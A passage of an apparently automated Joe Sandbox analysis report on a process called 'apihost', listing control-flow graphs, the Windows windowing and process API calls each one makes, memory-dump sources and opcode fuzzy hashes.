28863 6456890 7 API calls 28862->28863 28864 645816c 28862->28864 28863->28864 28864->28836 28865->28862 28882 645798c 28865->28882 28866 6457e45 28867 6456890 7 API calls 28866->28867 28870 6457eed 28866->28870 28868 6457eb7 28867->28868 28869 6456890 7 API calls 28868->28869 28869->28870 28871 6456890 7 API calls 28870->28871 28871->28862 28873 645b93b 28872->28873 28874 645d767 28873->28874 28875 645d72f 28873->28875 28881 645d736 28873->28881 28877 645d78c 28874->28877 28878 645d7b8 28874->28878 28876 6456890 7 API calls 28875->28876 28876->28881 28879 6456890 7 API calls 28877->28879 28880 6456890 7 API calls 28878->28880 28879->28881 28880->28881 28881->28838 28885 6457997 28882->28885 28883 6458307 28883->28866 28884 6456890 7 API calls 28887 64582c9 28884->28887 28885->28883 28886 6456890 7 API calls 28885->28886 28885->28887 28886->28887 28887->28883 28887->28884 28898 645d528 28899 645d570 SetWindowTextW 28898->28899 28900 645d56a 28898->28900 28901 645d5a1 28899->28901 28900->28899 28902 64503e8 28903 6450410 28902->28903 28904 6450438 28903->28904 28907 6450480 28903->28907 28914 6450498 28903->28914 28904->28904 28908 6450498 28907->28908 28921 64515b0 28908->28921 28927 64515a0 28908->28927 28909 64504d0 28913 6452208 7 API calls 28909->28913 28910 64504e1 28910->28904 28913->28910 28915 64504a7 28914->28915 28918 64515a0 3 API calls 28915->28918 28919 64515b0 3 API calls 28915->28919 28916 64504d0 28920 6452208 7 API calls 28916->28920 28917 64504e1 28917->28904 28918->28916 28919->28916 28920->28917 28922 64515cc 28921->28922 28924 6451621 28922->28924 28925 64516c0 2 API calls 28922->28925 28926 64516b0 2 API calls 28922->28926 28923 645161c 28923->28909 28924->28909 28925->28923 28926->28923 28928 64515cc 28927->28928 28930 6451621 28928->28930 28931 64516c0 2 API calls 28928->28931 28932 64516b0 2 API calls 28928->28932 28929 645161c 28929->28909 28930->28909 28931->28929 28932->28929

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 717 2e8f6ba-2e8f74f GetCurrentProcess 722 2e8f758-2e8f78c GetCurrentThread 717->722 723 2e8f751-2e8f757 717->723 724 2e8f78e-2e8f794 722->724 725 2e8f795-2e8f7c9 GetCurrentProcess 722->725 723->722 724->725 727 2e8f7cb-2e8f7d1 725->727 728 2e8f7d2-2e8f7ed call 2e8fc98 725->728 727->728 731 2e8f7f3-2e8f822 GetCurrentThreadId 728->731 732 2e8f82b-2e8f88d 731->732 733 2e8f824-2e8f82a 731->733 733->732
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 02E8F73E
                                                                                                                                                                                                                                      • GetCurrentThread.KERNEL32 ref: 02E8F77B
                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 02E8F7B8
                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 02E8F811
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000023.00000002.2959933543.0000000002E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E80000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_35_2_2e80000_apihost.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Current$ProcessThread
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2063062207-0
                                                                                                                                                                                                                                      • Opcode ID: 19ae578ce835256af1c039356e4c4ba3868d6d69d5944306956a039fe2699ef8
                                                                                                                                                                                                                                      • Instruction ID: 47622c50cba6e86c2c7279e042a06b2a1c5dc09f453806d21eff52790fb607de
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 19ae578ce835256af1c039356e4c4ba3868d6d69d5944306956a039fe2699ef8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3A5163B09102498FDB14DFAAD549B9EBBF1EB48318F20C059E05CA7360DB74A884CF65

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 740 2e8f6c0-2e8f74f GetCurrentProcess 744 2e8f758-2e8f78c GetCurrentThread 740->744 745 2e8f751-2e8f757 740->745 746 2e8f78e-2e8f794 744->746 747 2e8f795-2e8f7c9 GetCurrentProcess 744->747 745->744 746->747 749 2e8f7cb-2e8f7d1 747->749 750 2e8f7d2-2e8f7ed call 2e8fc98 747->750 749->750 753 2e8f7f3-2e8f822 GetCurrentThreadId 750->753 754 2e8f82b-2e8f88d 753->754 755 2e8f824-2e8f82a 753->755 755->754
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 02E8F73E
                                                                                                                                                                                                                                      • GetCurrentThread.KERNEL32 ref: 02E8F77B
                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 02E8F7B8
                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 02E8F811
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000023.00000002.2959933543.0000000002E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E80000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_35_2_2e80000_apihost.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Current$ProcessThread
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2063062207-0
                                                                                                                                                                                                                                      • Opcode ID: 1baa6f7e351bdf9e9d22dcbd1e03fc52764ff14e37afee044cdc16b7a6e30c89
                                                                                                                                                                                                                                      • Instruction ID: f8683450b30d8b0a59b76b3945bed402bacf468c1211e0eaff1bd567283cfd70
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1baa6f7e351bdf9e9d22dcbd1e03fc52764ff14e37afee044cdc16b7a6e30c89
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 165163B09102498FDB14DFAAD549B9EBBF1EF48318F20C059E058A7360DB74A884CF65

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 762 645f99f-645f9a8 763 645f93b-645f974 CreateIconFromResourceEx 762->763 764 645f9aa-645fa0f GetSystemMetrics 762->764 767 645f976-645f97c 763->767 768 645f97d-645f99a 763->768 765 645fa11-645fa17 764->765 766 645fa18-645fa49 GetSystemMetrics 764->766 765->766 769 645fa52-645fa72 766->769 770 645fa4b-645fa51 766->770 767->768 770->769
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,0645F8C2,?,?,?,?,?), ref: 0645F967
                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000031), ref: 0645F9FE
                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000032), ref: 0645FA38
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000023.00000002.2982246712.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_35_2_6450000_apihost.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MetricsSystem$CreateFromIconResource
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3002642008-0
                                                                                                                                                                                                                                      • Opcode ID: 94dffaca5eca65bbccbd03dffbd8d7c0f950701b4c84e59e8a153a502e500407
                                                                                                                                                                                                                                      • Instruction ID: 1c98715d21fe1740b42b6ecfe8ab2774bb3ce43650c1f8371627fedfdcbcb730
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 94dffaca5eca65bbccbd03dffbd8d7c0f950701b4c84e59e8a153a502e500407
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 454156B1800348CFDB51CF99D4497DEBFF4EB49314F25845AE558AB261C3789988CFA2

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 775 64516c0-64516d9 776 645175c-645175f 775->776 777 64516df-64516e3 775->777 778 64516e5-64516ff 777->778 779 6451760-64517ce 777->779 784 6451701-6451708 778->784 785 6451713-6451735 778->785 799 64517d4-64517fa 779->799 800 6451888-645188d 779->800 784->785 786 645170a-645170c 784->786 792 645173c-645173e 785->792 786->785 794 6451755 792->794 795 6451740-645174c 792->795 794->776 795->794 798 645174e 795->798 798->794 804 64517fc-6451807 799->804 805 645180a-645180f 799->805 804->805 806 6451811 805->806 807 6451818-6451820 805->807 813 6451813 call 64c0ad8 806->813 814 6451813 call 64c0ac9 806->814 808 6451845-645187e KiUserCallbackDispatcher 807->808 809 6451822-645183b 807->809 815 6451883 call 64c0eb0 808->815 816 6451883 call 64c0ea2 808->816 809->808 813->807 814->807 815->800 816->800
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • KiUserCallbackDispatcher.NTDLL(00000037,00000000,00000000,03FF4164,0309FF60,?,00000000,?,00000000,00000000), ref: 06451877
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000023.00000002.2982246712.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_35_2_6450000_apihost.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CallbackDispatcherUser
                                                                                                                                                                                                                                      • String ID: Hbq
                                                                                                                                                                                                                                      • API String ID: 2492992576-1245868
                                                                                                                                                                                                                                      • Opcode ID: 8e3267b983061757199910d3b5271faad246d13a499ddab798c8fae93bf8dfa4
                                                                                                                                                                                                                                      • Instruction ID: a01e0388c1e417e76866b150bf92986a9d24e30f651c0cbab080bd199d2f9d9c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8e3267b983061757199910d3b5271faad246d13a499ddab798c8fae93bf8dfa4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5A517A347406108FD759AB29C464B2E77ABEFC4B50F16846AE80ACB7A1CF74DD02CB94

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 842 2e8d418-2e8d437 843 2e8d439-2e8d446 call 2e8c720 842->843 844 2e8d463-2e8d467 842->844 851 2e8d448 843->851 852 2e8d45c 843->852 846 2e8d469-2e8d473 844->846 847 2e8d47b-2e8d4bc 844->847 846->847 853 2e8d4c9-2e8d4d7 847->853 854 2e8d4be-2e8d4c6 847->854 898 2e8d44e call 2e8d6c0 851->898 899 2e8d44e call 2e8d6b0 851->899 852->844 855 2e8d4d9-2e8d4de 853->855 856 2e8d4fb-2e8d4fd 853->856 854->853 858 2e8d4e9 855->858 859 2e8d4e0-2e8d4e7 call 2e8c72c 855->859 861 2e8d500-2e8d507 856->861 857 2e8d454-2e8d456 857->852 860 2e8d598-2e8d658 857->860 863 2e8d4eb-2e8d4f9 858->863 859->863 893 2e8d65a-2e8d65d 860->893 894 2e8d660-2e8d68b GetModuleHandleW 860->894 864 2e8d509-2e8d511 861->864 865 2e8d514-2e8d51b 861->865 863->861 864->865 866 2e8d528-2e8d531 call 2e8c73c 865->866 867 2e8d51d-2e8d525 865->867 873 2e8d53e-2e8d543 866->873 874 2e8d533-2e8d53b 866->874 867->866 875 2e8d561-2e8d56e 873->875 876 2e8d545-2e8d54c 873->876 874->873 882 2e8d570-2e8d58e 875->882 883 2e8d591-2e8d597 875->883 876->875 878 2e8d54e-2e8d55e call 2e8c74c call 2e8c75c 876->878 878->875 882->883 893->894 895 2e8d68d-2e8d693 894->895 896 2e8d694-2e8d6a8 894->896 895->896 898->857 899->857
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 02E8D67E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000023.00000002.2959933543.0000000002E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E80000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_35_2_2e80000_apihost.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: HandleModule
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4139908857-0
                                                                                                                                                                                                                                      • Opcode ID: 4429e0a381b17fa90bdd03a330ad6bcbdaad9c492eb3eadc8a049d3e0235329b
                                                                                                                                                                                                                                      • Instruction ID: 9b1cd380a929ba8e5184969b2b861aa32bdaa8345d8033d7e94a2a2d0b85b9c0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4429e0a381b17fa90bdd03a330ad6bcbdaad9c492eb3eadc8a049d3e0235329b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A3813570A00B449FD724EF39D450B9ABBF1FF48318F108A2ED48A97A50D775E849CB90

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 900 6453e64-6453ed6 901 6453ee1-6453ee8 900->901 902 6453ed8-6453ede 900->902 903 6453ef3-6453f2b 901->903 904 6453eea-6453ef0 901->904 902->901 905 6453f33-6453f92 CreateWindowExW 903->905 904->903 906 6453f94-6453f9a 905->906 907 6453f9b-6453fd3 905->907 906->907 911 6453fd5-6453fd8 907->911 912 6453fe0 907->912 911->912 913 6453fe1 912->913 913->913
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06453F82
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000023.00000002.2982246712.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_35_2_6450000_apihost.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 716092398-0
                                                                                                                                                                                                                                      • Opcode ID: c294ef0f5f6160c0110fd198c968aca5103987faf1a05bcee23d4db25ac3f301
                                                                                                                                                                                                                                      • Instruction ID: e6ea747c5cb902dcb1fae17465e78a6e534e073377a1f8e0407806f6b357f4bb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c294ef0f5f6160c0110fd198c968aca5103987faf1a05bcee23d4db25ac3f301
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9651EDB1D003499FDF15CFA9C884ADEBBB2FF48354F25812AE818AB211D7749885CF90

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 914 6453e70-6453ed6 915 6453ee1-6453ee8 914->915 916 6453ed8-6453ede 914->916 917 6453ef3-6453f92 CreateWindowExW 915->917 918 6453eea-6453ef0 915->918 916->915 920 6453f94-6453f9a 917->920 921 6453f9b-6453fd3 917->921 918->917 920->921 925 6453fd5-6453fd8 921->925 926 6453fe0 921->926 925->926 927 6453fe1 926->927 927->927
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06453F82
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000023.00000002.2982246712.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_35_2_6450000_apihost.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 716092398-0
                                                                                                                                                                                                                                      • Opcode ID: f7ab6b518b2961a1bfca7f12fa2e96cc286175e7f6706ee6723e1585897da5a9
                                                                                                                                                                                                                                      • Instruction ID: 71f31b72eb7698fbe93bcc9fc499135a53a26d89c6e81bf8c8f2c62b15672a72
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f7ab6b518b2961a1bfca7f12fa2e96cc286175e7f6706ee6723e1585897da5a9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A141C0B1D003499FDB15CF99C884ADEFBB5FF48354F25812AE819AB211D7719885CF90

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 928 6451c94-64565ec 931 64565f2-64565f7 928->931 932 645669c-64566bc call 6451b6c 928->932 934 64565f9-6456630 931->934 935 645664a-6456682 CallWindowProcW 931->935 939 64566bf-64566cc 932->939 941 6456632-6456638 934->941 942 6456639-6456648 934->942 937 6456684-645668a 935->937 938 645668b-645669a 935->938 937->938 938->939 941->942 942->939
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 06456671
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000023.00000002.2982246712.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_35_2_6450000_apihost.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CallProcWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2714655100-0
                                                                                                                                                                                                                                      • Opcode ID: eeca9a08149fcecbffa4b874bf9634459d390647866bfcf4143eca5a53b5aa57
                                                                                                                                                                                                                                      • Instruction ID: ddb22cad54b92ff79360b19f3e811ff88d9663b388f24e5e96e318f9234ad729
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eeca9a08149fcecbffa4b874bf9634459d390647866bfcf4143eca5a53b5aa57
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D64127B4900305CFCB54CF99C488AAABBF5FB88314F26C459E919AB321D730A841CFA0

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 945 645f8a8-645f8bd call 645e41c 947 645f8bf-645f8cd 945->947 949 645f8e2-645f8f4 947->949 950 645f8cf-645f8df call 645f368 947->950 949->947 954 645f8f6-645f974 CreateIconFromResourceEx 949->954 956 645f976-645f97c 954->956 957 645f97d-645f99a 954->957 956->957
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000023.00000002.2982246712.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_35_2_6450000_apihost.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateFromIconResource
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3668623891-0
                                                                                                                                                                                                                                      • Opcode ID: 5f6138f61922df7a7ec779cb9827abdfe3d3839a50a47604e512da4ae06ac90f
                                                                                                                                                                                                                                      • Instruction ID: 3c60a9ce1d01c198836aa571fb3c85631612c51aa23b7730698a7af189032790
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5f6138f61922df7a7ec779cb9827abdfe3d3839a50a47604e512da4ae06ac90f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F03169729042599FCB51DFAAD840ADEBFF8EF09310F15805AE954AB222C3359854DFA2

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 960 2e8fd0a-2e8fd0b 961 2e8fd10-2e8fda4 DuplicateHandle 960->961 962 2e8fdad-2e8fdca 961->962 963 2e8fda6-2e8fdac 961->963 963->962
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02E8FD97
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000023.00000002.2959933543.0000000002E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E80000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_35_2_2e80000_apihost.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: DuplicateHandle
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3793708945-0
                                                                                                                                                                                                                                      • Opcode ID: f10a2dc083711be6911c95faacae61892f5a57e2a1ad056e5d554db03e342cea
                                                                                                                                                                                                                                      • Instruction ID: 306ef1e648c3c5695e70e1fe9994af0e29c05ce76e35cb9231d3069cb4c45689
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f10a2dc083711be6911c95faacae61892f5a57e2a1ad056e5d554db03e342cea
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6721C6B5D00258AFDB10CF9AD984ADEBFF4EB48324F14841AE958A7350D378A944CFA5
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02E8FD97
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000023.00000002.2959933543.0000000002E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E80000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_35_2_2e80000_apihost.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: DuplicateHandle
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3793708945-0
                                                                                                                                                                                                                                      • Opcode ID: 232ae31fc4c6bbe053c0e6f3405d67599ca03e85e1b2634fd15787a9491e265d
                                                                                                                                                                                                                                      • Instruction ID: 2348f33b50ebc90459d420a5be02120bd0e58f50e6913e6ef91e377a087890ea
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 232ae31fc4c6bbe053c0e6f3405d67599ca03e85e1b2634fd15787a9491e265d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D421C4B5D002589FDB10CFAAD584ADEBFF4EB48324F14841AE958A7350D374A944CFA5
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,0645F8C2,?,?,?,?,?), ref: 0645F967
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000023.00000002.2982246712.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_35_2_6450000_apihost.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateFromIconResource
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3668623891-0
                                                                                                                                                                                                                                      • Opcode ID: 4dd92acac8ac15021c49f798f7c818784f0b197bd5b1a25426f62085318fce17
                                                                                                                                                                                                                                      • Instruction ID: 3ffa6026c23bd54ea95fce1621e0c5f042f554cfc3e016c7fe2ae1a2430b907a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4dd92acac8ac15021c49f798f7c818784f0b197bd5b1a25426f62085318fce17
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 171126B1900359DFDB50CFAAD844BDEBFF8EB48320F14841AE954A7211C375A954CFA5
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,00000000), ref: 0645D592
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000023.00000002.2982246712.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_35_2_6450000_apihost.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: TextWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 530164218-0
                                                                                                                                                                                                                                      • Opcode ID: 213078c14705284c9ea671e30e898e1030331d4e3c5bcc72cb73f415c478abc5
                                                                                                                                                                                                                                      • Instruction ID: d4619075ce5b9fc19c08b7a57202c044b0953d24a2f0fae38823744b378ca09f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 213078c14705284c9ea671e30e898e1030331d4e3c5bcc72cb73f415c478abc5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 822133B2D002498FCB14CF9AC444BDEFBF4EF88324F10802AE868A7251D338A545CFA5
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,00000000), ref: 0645D592
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000023.00000002.2982246712.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_35_2_6450000_apihost.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: TextWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 530164218-0
                                                                                                                                                                                                                                      • Opcode ID: fa7269b100d2e082f46117b7300787c6fe112adfcaaec2fede29fda90c774121
                                                                                                                                                                                                                                      • Instruction ID: bc48690a3581d13d10943408a30db5465d81128cda707beef0fbd8ef7f50ab40
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fa7269b100d2e082f46117b7300787c6fe112adfcaaec2fede29fda90c774121
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7211E2B6D002498FDB14CF9AC844BDEFBF4EF88324F15842AD868A7251D378A545CFA5
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,?,?,?,?,?,?,?,00000000,?,?), ref: 0645FCCD
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000023.00000002.2982246712.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_35_2_6450000_apihost.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3850602802-0
                                                                                                                                                                                                                                      • Opcode ID: 1a0c21e3be2280d6f2992f11dbdba482ccc04a8ff094f8a127fcdd7d913d6c92
                                                                                                                                                                                                                                      • Instruction ID: b9c5741137a93d2ab4eae780a1b38ef7e50b47b8d206c3b14b028decad6028a6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1a0c21e3be2280d6f2992f11dbdba482ccc04a8ff094f8a127fcdd7d913d6c92
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A51125B5800348DFCB50DF99C448BDEBBF8FB48320F10841AE918A7200C374A944CFA5
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,FFFFFFF4,?), ref: 06454115
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000023.00000002.2982246712.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_35_2_6450000_apihost.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: LongWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1378638983-0
                                                                                                                                                                                                                                      • Opcode ID: 7d32c60069c542d896ccd0c426192d5365abd51aedacc6b98a973252e6d24fce
                                                                                                                                                                                                                                      • Instruction ID: 91af6a99d2dc8050ca4d4bc139a48b7734dd967f4420e6f3f637b74799f665b7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7d32c60069c542d896ccd0c426192d5365abd51aedacc6b98a973252e6d24fce
